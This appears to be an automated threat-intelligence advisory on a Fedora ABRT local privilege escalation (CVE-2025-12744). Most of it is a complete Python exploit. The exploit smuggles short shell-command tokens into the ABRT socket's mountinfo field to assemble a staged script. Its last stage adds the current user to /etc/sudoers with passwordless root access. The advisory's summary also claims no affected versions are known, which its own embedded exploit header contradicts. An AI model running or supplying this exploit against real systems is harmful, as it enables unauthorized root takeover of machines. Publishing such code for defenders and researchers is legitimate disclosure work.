Fedora - Local Privilege Escalation
This is a local privilege escalation vulnerability affecting Fedora systems. An exploit has been published that allows an attacker with local access to escalate privileges. The exploit code is available and written in Python. No specific affected versions or patch information is provided.
AI Analysis
Technical Summary
The threat involves a local privilege escalation vulnerability in Fedora. The exploit enables a user with local access to gain elevated privileges on the system. The available exploit code is implemented in Python. There is no detailed information on the exact vulnerability mechanism, affected Fedora versions, or vendor-provided patches.
Potential Impact
Successful exploitation could allow a local attacker to gain higher privileges, potentially leading to unauthorized system control or access to sensitive data. However, no information is provided about active exploitation in the wild or specific affected versions.
Mitigation Recommendations
Patch status is not yet confirmed — check the Fedora vendor advisory for current remediation guidance. Until an official fix is available, restrict local access to trusted users only and monitor for suspicious local activity.
Indicators of Compromise
- exploit-code:

```python
# Exploit Title: Fedora Local Privilege Escalation via ABRT
# Date: 07-October-2025
# Exploit Author: initstring
# Vendor Homepage: https://fedoraproject.org
# Software Link: https://fedoraproject.org/server/download
# Version: Fedora 43 and below (running ABRT v 2.17.7 and below)
# Tested on: Fedora 42 Workstation & Server, Fedora 43 Workstation & Server
# CVE : CVE-2025-12744

"""
abrt_root: local privilege escalation vulnerability in Fedora's ABRT
Research and development by initstring.
"""

import getpass
import socket
import time
import uuid
from pathlib import Path

BANNER = """
####################################################################
abrt_root: local privilege escalation vulnerability in Fedora's ABRT
Research and development by initstring.
####################################################################
"""

SOCKET_PATH = "/var/run/abrt/abrt.socket"
HELPER_SCRIPT_NAME = "final"
RESET_TOKEN = ";:>q;:;:;:;:"
EXEC_TOKEN = ";sh\tq;:;:;:;"
APPEND_TEMPLATE = ";printf\t{char}>>q"
MAX_RETRIES = 10
SLEEP_BETWEEN_TOKENS = 0.5


def build_body(payload: str, reason: str, unique: str) -> bytes:
    pid = str(int(unique[:4], 16) % 30000 + 1).encode()
    cmdline = f"/usr/bin/python3 {unique}".encode()
    container_cmd = f"/usr/bin/docker run test {unique}".encode()
    type_tag = f"Python3-{unique[:6]}".encode()

    fields = [
        (b"type", type_tag),
        (b"reason", reason.encode()),
        (b"pid", pid),
        (b"executable", f"/usr/bin/python3-{unique}".encode()),
        (b"cmdline", cmdline),
        (b"container_cmdline", container_cmd),
        (b"mountinfo", b"74 2 0:36 / / rw,relatime shared:1 - ext4 " + payload.encode() + b"\n"),
        (b"backtrace", f"trace {reason} {unique}".encode()),
        (b"uuid", unique.encode()),
        (b"duphash", unique.encode()),
    ]

    body = bytearray()
    for key, value in fields:
        body += key + b"=" + value + b"\0"
    return bytes(body)


def send_once(payload: str) -> str:
    token = "/docker-" + payload
    unique = uuid.uuid4().hex
    reason = f"auto root {int(time.time())}-{unique[:6]}"
    blob = b"POST / HTTP/1.1\r\n\r\n" + build_body(token, reason, unique)

    with socket.socket(socket.AF_UNIX, socket.SOCK_STREAM) as sock:
        sock.connect(SOCKET_PATH)
        sock.sendall(blob)
        sock.shutdown(socket.SHUT_WR)
        reply = sock.recv(4096).decode(errors="ignore").strip()
    return reply or "<no response>"


def send_with_retry(payload: str) -> None:
    for attempt in range(1, MAX_RETRIES + 1):
        reply = send_once(payload)
        # DEBUG
        # print(f"[{payload!r}] attempt {attempt}: {reply}")
        if "201" in reply:
            time.sleep(SLEEP_BETWEEN_TOKENS)
            return
        time.sleep(SLEEP_BETWEEN_TOKENS)
    raise RuntimeError(f"Failed to send payload '{payload}' with HTTP 201")


def token_for_char(ch: str) -> str:
    token = APPEND_TEMPLATE.format(char=ch)
    if len(token) != 12:
        raise ValueError(f"Character {ch!r} produced token length {len(token)}")
    return token


def main() -> None:
    print(BANNER)

    # First we write out the third/final stage to a script in the current working directory.
    # It contains our ultimate goal - escaping the systemd sandbox to write our current
    # low-priv user name to /etc/sudoers to give us root access.
    current_user = getpass.getuser()
    cwd = Path.cwd()
    helper_script_path = cwd / HELPER_SCRIPT_NAME
    helper_script_path.write_text(
        f"systemd-run --pty -- bash -lc \"echo '{current_user} ALL=(ALL) NOPASSWD: ALL' >> /etc/sudoers\"\n",
        encoding="ascii",
    )
    helper_script_path.chmod(0o755)

    # Next we build the text which will be written to the second stage script.
    # It is meant to call the third stage script. Characters are limited in this second stage
    # script, which is why we can't just list the complex commands from above.
    # The PWD vars you see are not resolved here in the Python script - they are instead
    # resolved when the targeted daemon executes the script. It has `PWD=/` in its context
    # which allows us to write the `/` which otherwise is filtered out during this stage
    # of the attack.
    command = "${PWD}" + "${PWD}".join(helper_script_path.resolve().parts[1:])

    # The reset token just clears the file (/q) where we are writing that second stage to.
    print("[+] Executing stage one...")
    send_with_retry(RESET_TOKEN)
    time.sleep(3)

    # This is stage one of the attack. We have just enough bytes to perfectly inject a
    # command which will append one character to a file. It loops through to write out
    # the second stage script to `/q`
    for index, ch in enumerate(command, 1):
        token = token_for_char(ch)
        # DEBUG
        # print(f"[+] Staging char {index}/{len(command)} -> {token!r}")
        send_with_retry(token)

    # This uses the same 12-byte gadget to execute the stage two script that has
    # now been written to `/q`. That script, in turn, executes the stage three script
    # which has no character limitations and completes the exploit.
    print("[+] Chaining execution of stage two and three...")
    send_with_retry(EXEC_TOKEN)

    print("\n[+] Now you're playing with power.")


if __name__ == "__main__":
    main()
```
Technical Details
- Edb Id: 52515
- Has Exploit Code: true
- Code Language: python
Threat ID: 69f1f0fdcbff5d8610047e76
Added to database: 4/29/2026, 11:52:29 AM
Last enriched: 4/29/2026, 11:53:56 AM
Last updated: 4/30/2026, 3:48:51 AM